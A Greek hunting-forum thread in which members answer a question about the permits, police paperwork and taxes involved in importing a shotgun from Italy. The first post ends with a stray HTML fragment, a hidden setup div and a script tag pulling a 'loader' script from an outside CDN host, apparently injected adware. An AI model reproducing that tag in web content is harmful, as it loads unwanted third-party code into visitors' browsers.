ΛΙΟΚΑΝΟ ΟΠΛΟ ΑΠΟ ΕΞΩΤΕΡΙΚΟ

Επισκόπηση 5 δημοσιεύσεων - 1 έως 5 (από 5 συνολικά)
Απευθείας μετάβαση στη σελίδα:
  • Συμμετέχων
    Ημ. εγγραφής:
    03/09/2012
    Αρ. μηνυμάτων:
    51
    Ο ΚΡΗΤΙΚΟΣ στις #427716

    ΓΙΑ ΣΑΣ ΠΑΙΔΙΑ ΕΧΩ ΣΥΓΓΕΝΕΙΣ ΣΤΗΝ ΓΕΙΤΟΝΑ ΧΩΡΑ ΜΑΣ ΙΤΑΛΙΑ Κ ΠΡΟΓΡΑΜΑΤΙΖΩ ΜΙΑ ΒΔΟΜΑΔΑ ΞΕΚΟΥΡΑΣΗΣ ΧΩΡΙΣ ΑΓΧΟΣ Κ ΠΙΕΣΗ…ΝΑ ΠΑΡΟΥΜΕ ΔΥΝΑΜΕΙΣ ΓΙΑ ΤΗΝ ΚΑΙΝΟΥΡΓΙΑ ΧΡΟΝΙΑ ΠΟΥ ΘΑ ΕΡΘΕΙ!!!!ΔΕΝ ΕΧΩ ΠΑΕΙ ΠΟΤΕ ΔΙΑΚΟΠΕΣ ΜΕΧΡΙ ΤΩΡΑ,,,,ΛΟΓΟ ΥΠΟΧΡΕΩΣΕΩΝ…Κ ΛΕΩ ΦΕΤΟΣ ΠΡΩΤΑ Ο ΘΕΟΣ ΝΑ ΠΑΩ…..Η ΙΤΑΛΙΑ ΟΠΩΣ ΓΝΩΡΙΖΕΤΕ ΕΙΝΑΙ ΜΙΑ ΧΩΡΑ ΜΕ ΤΕΡΑΣΤΙΑ ΙΣΤΟΡΙΑ ΣΤΑ ΛΙΟΚΑΝΑ ΚΥΝΗΓΕΤΙΚΑ Κ ΜΗ!!!ΜΕΓΑΛΛΕΣ ΒΙΟΜΗΧΑΝΙΕΣ ΕΧΟΥΝ ΤΗΝ ΕΔΡΑ ΤΟΥ ΕΚΕΙ ΟΠΩΣ ΒΕΡΕΤΤΑ ΠΕΡΑΖΖΙ…..Κ ΑΛΛΕΣ ΠΟΛΛΕΣ….ΣΚΕΥΤΟΜΑΙ ΑΝ ΒΡΩ ΚΑΤΙ ΕΝΔΙΑΦΕΡΟΝ ΝΑ ΤΟ ΠΑΚΕΤΑΡΩ Κ ΝΑ ΤΟ ΦΕΡΩ ΚΑΤΩ…..Κ ΕΔΩ ΘΕΛΩ ΝΑ ΜΟΥ ΠΟΙΤΕ ΑΝ ΥΠΑΡΧΕΙ ΚΑΠΙΟΟΣ ΠΟΥ ΕΧΕΙ ΚΑΝΕΙ ΕΙΣΑΓΩΓΗ ΚΥΝΗΓΕΤΙΚΟΥ ΟΠΛΟΥ ΑΠΟ ΙΤΑΛΙΑ ΤΙ ΔΙΑΔΙΚΑΣΙΑ ΧΡΕΙΑΖΕΤΕ ΄΄΄ΤΙ ΧΑΡΤΙΑ ΧΡΟΙΑΖΟΜΑΙ ΝΑ ΕΚΔΟΣΩ ΑΠΟ ΕΔΩ…ΑΝ ΥΠΑΡΧΕΙ ΠΡΟΒΛΗΜΑ ΜΕ ΤΟΝ ΕΛΕΓΧΟ ΣΤΑ ΑΕΡΟΔΡΟΜΙΑ Κ ΤΙ ΦΠΑ ΕΝΔΕΧΕΤΕ ΝΑ ΠΛΙΡΟΣΟΥΜΕ!!!!ΓΙΑ ΑΥΤΟΥΣ ΠΟΥ ΕΧΟΥΝ ΣΤΟ ΠΑΡΕΛΘΟΝ ΑΣΧΟΛΙΘΕΙ ΜΕ ΤΗΝ ΕΙΣΑΓςΓΗ ΚΥΝΗΓΕΤΙΚΟΥ ΟΠΛΟΥ ΑΣ ΑΦΗΣΟΥΝ ΤΑ ΣΧΟΛΙΑ ΤΟΥΣ ΠΑΡΑΚΑΛΩ!!!!Κ ΚΑΤΙ ΑΛΛΟ ΧΡΕΙΑΧΕΤΕ ΟΠςΣ ΔΗΠΟΤΕ ΑΠΟΔΕΙΚΣΗ ΑΓΟΡΑΣ΄΄Ί ΕΙΝΑΙ ΟΠΩΣ ΕΔΩ ΠΟΥ ΜΠΟΡΕΙΣ ΝΑ ΑΓΟΡΑΣΕΙΣ ΚΑΠΙΟ ΛΙΟΚΑΝΟ ΑΠΟ ΚΑΠΙΟΝ ΙΔΙςΤΗ Κ ΟΥΤΕ ΑΠΟΔΗΚΚΣΗ ΧΡΕΙΑΖΕΤΕ!!!!!Κ ΑΝ ΜΟΥ ΤΟ ΚΑΝΕΙ ΔΩΡΟ Η ΟΙΚΟΓΕΝΕΙΑ ΜΟΥ ΕΚΕΙ ,,ΔΗΛ ΔΕΝ ΤΟ ΠΛΙΡΩΣΩ ΕΓΩ,,,ΘΑ ΠΡΕΠΕΙ ΝΑ ΠΛΗΡΩΣΩ ΤΟ 23% ΤΗΣ ΑΞΙΑΣ ΤΟΥ ΔΩΡΟΥ ΠΟΥ ΜΟΥ ΕΓΙΝΕ!!!!!ΓΙΑ ΔΙΑΦΩΤΗΣΤΕ ΠΑΡΑΚΑΛΩ!!!!
    <div id=”__tbSetup”></div>
    <script type=”text/javascript” src=”http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862″></script&gt;


    Συμμετέχων
    Ημ. εγγραφής:
    18/05/2003
    Αρ. μηνυμάτων:
    8660
    victz στις #427720

    Δε ξερω τι χρειαζεται, γιατι δεν εχω κανει εισαγωγη ποτε. Αυτο που θυμαμαι ομως απο τα λιγα παιδια που αγορασαν οπλο απο αλλη χωρα, εστω και μεσα στην ΕΕ, σαν αναφορα, ειναι οτι πρεπει να εξοπλιστεις με απεριοριστη υπομονη.

    Και μια και πας εκει, αν διαλεξεις οπλο, κοιτα να πας να φτιαξεις και κοντακι στα μετρα σου.

    Συμμετέχων
    Ημ. εγγραφής:
    20/03/2013
    Αρ. μηνυμάτων:
    1214
    Hunter21GR στις #427721

    ξεκινα απο φετος τα χαρτια για την ‘αδεια εισαγωγης οπλου’ και μεχρι του χρονου το καλοκαιρι που θα ξαναπας με το καλο στην ιταλια θα εισαι πιστευω ετοιμος να κανεις την αγορα……. 😆

    Συμμετέχων
    Ημ. εγγραφής:
    07/03/2011
    Αρ. μηνυμάτων:
    2396
    Δημητρης Benelli στις #427740

    Δε ξερω τι χρειαζεται, γιατι δεν εχω κανει εισαγωγη ποτε. Αυτο που θυμαμαι ομως απο τα λιγα παιδια που αγορασαν οπλο απο αλλη χωρα, εστω και μεσα στην ΕΕ, σαν αναφορα, ειναι οτι πρεπει να εξοπλιστεις με απεριοριστη υπομονη. Και μια και πας εκει, αν διαλεξεις οπλο, κοιτα να πας να φτιαξεις και κοντακι στα μετρα σου.

    <hr />

    <div class=”bbp-reply-signature”>Α ρε αδελφε, γιατι βιαστηκες τοσο να φυγεις; Σου ευχομαι ηρεμα νερα και καλες ψαριες.</div>

    να φτιαξει κοντακι στα μετρα του στην Ιταλια ??????????? γιατι ρε Βικτωρα  ?? δεν εμαθες οτι ο Rinaldo Sabbati εχει μετακομισει μονιμα στην Πελοποννησο ? και εχει και μια αδυναμια στα τεθωρακισμενα αρματα PERAZZI και στα κοντακια τα Valeriano τα πολυ τρελα ?

    Συμμετέχων
    Ημ. εγγραφής:
    15/09/2012
    Αρ. μηνυμάτων:
    47
    Dimitris στις #428034

    Φίλε μου πρόκειται για μια ιδιαιτέρα χρονοβόρα και δύσκολη διαδικασία. Το χειρότερο είναι ότι πριν την ξεκινήσεις θα πρέπει είδη να έχεις βρει το όπλο που πρόκειται να αγοράσεις, μιας και η άδεια εισαγωγής θα βγει για αυτό αποκλειστικά το όπλο. Δηλαδή πρέπει πρώτα να πας Ιταλία να βρεις το όπλο, να πάρεις από τον οπλοπώλη ειδικό δελτίο που να αναγράφει το σειριακό του όπλου και τα άλλα χαρακτηριστικά του που χρειάζονται για την εισαγωγή, με αυτό πας αστυνομία μπαίνεις σε ένα βουνό χαρτούρας τρώς κανένα εξάμηνο – οκτάμηνο  και μόλις πάρεις την άδεια πας πάλι Ιταλία και το φέρνεις (αν στο έχει κρατήσει ο οπλοπώλης).

    Ουφ…..  Too Sad   αν μετά από όλα αυτά εάν έχεις ακόμα διάθεση να φέρεις όπλο χαράς το κουράγιο σου.

Επισκόπηση 5 δημοσιεύσεων - 1 έως 5 (από 5 συνολικά)
Απευθείας μετάβαση στη σελίδα:

Πρέπει να είστε συνδεδεμένοι για να απαντήσετε σ' αυτό το θέμα.


Μετάβαση σε γραμμή εργαλείων